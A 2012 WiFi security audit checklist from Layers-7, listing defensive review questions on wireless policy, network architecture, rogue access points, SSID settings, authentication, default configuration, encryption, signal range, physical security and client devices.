Vous êtes sur la page 1sur 5

Layers-7 Copyright 2012. All Rights Reserved Governance Risk Compliance Proprietary & Confidential www.layers-7.

com
WIFI AUDIT CHECKLIST
Layers-7 Copyright 2012. All Rights Reserved Governance Risk Compliance Proprietary & Confidential www.layers-7.com
CHECKLIST
Security Policy for Wifi
Review the WLAN security policy to find out any security shortcomings and ensure whether
they are managed consistently with managements intent.
WLAN Architecture
Do you have a network diagram?
Identify logical separation of wired & wireless network based on the network diagram.
Determine the placement of the access point - Is it running behind the firewall?
Who has access to Wifi? (Internal user or external users?)
Are Wifi granted access to internet?
Whether the wireless IDS/IPS is installed to monitor the traffic.
Are wifi traffic log stored in a syslog server?
Are the logs reviewed regularly?
Are access failure (login failure) detected?
Detect Rogue Access points
Scan for any unauthorised access points present in the network.
Check whether the WIDS/IPS is deployed to monitor the traffic.
SSID Broadcasting
The SSID is visible using a packet sniffer or wireless detection tools from any station within
radio range.
SSID Broadcasting should be disabled
SSID should be changed from default and not specific to company






Layers-7 Copyright 2012. All Rights Reserved Governance Risk Compliance Proprietary & Confidential www.layers-7.com
CHECKLIST
Authentication
Utilize third party authenticating devices to enhance the security of a wireless network
e.g. RADIUS server
MAC Address Filtering: Check whether the mac address filtering Is enabled on the
access point using the admin panel.
DHCP pool Restriction if any?
Default Configuration
Type the AP IP in the browser and go to the management interface, check whether the
AP default settings should be changed to make it more difficult to identify and penetrate
wireless network.
Has the default administrative login/password been changed?
Is the administrative password easily cracked?
Check the AP admin panel to know
Are encrypted administrative interfaces available (e.g., SSH, HTTPS)?
Is the AP running the latest firmware and security patches?
Configuration Management how it is enforced?
How the configuration changes should be done.
Whether they follow the change management process. Review documents for Change
management.
Layers-7 Copyright 2012. All Rights Reserved Governance Risk Compliance Proprietary & Confidential www.layers-7.com
CHECKLIST
Encryption
WPA2/PSK should be used. Stronger encryption necessary.
If the AP is using a PreShared Key (PSK), is it easily cracked?
Changing encryption keys in regular intervals.
RF Management
AP should be placed in an area that will limit broadcasting of signal outside of building.
Minimize the power of the AP signal to restrict signal outside of the building.
AP broadcasts in a 360 degree circle . Consider using directional antenna to minimize
the signal in areas you do not need wireless coverage in.
Physical Security
Wireless AP should be stored in a secure location.
User awareness training have to done at least on yearly basis.
Physical Failure of Access Point What are the business impact? What is
the continuity plan?





Layers-7 Copyright 2012. All Rights Reserved Governance Risk Compliance Proprietary & Confidential www.layers-7.com
CHECKLIST END STATION
Is the station running the latest OS and application security patches?
Are current antivirus program running?
Is the wireless interface protected by a personal firewall?
Are potential wireless intrusions (e.g., blocked sessions) being logged?
Is the wireless client willing to associate to ANY network? ANY Ad Hoc?
If using 802.1X, is it using a vulnerable EAP type (e.g., LEAP)?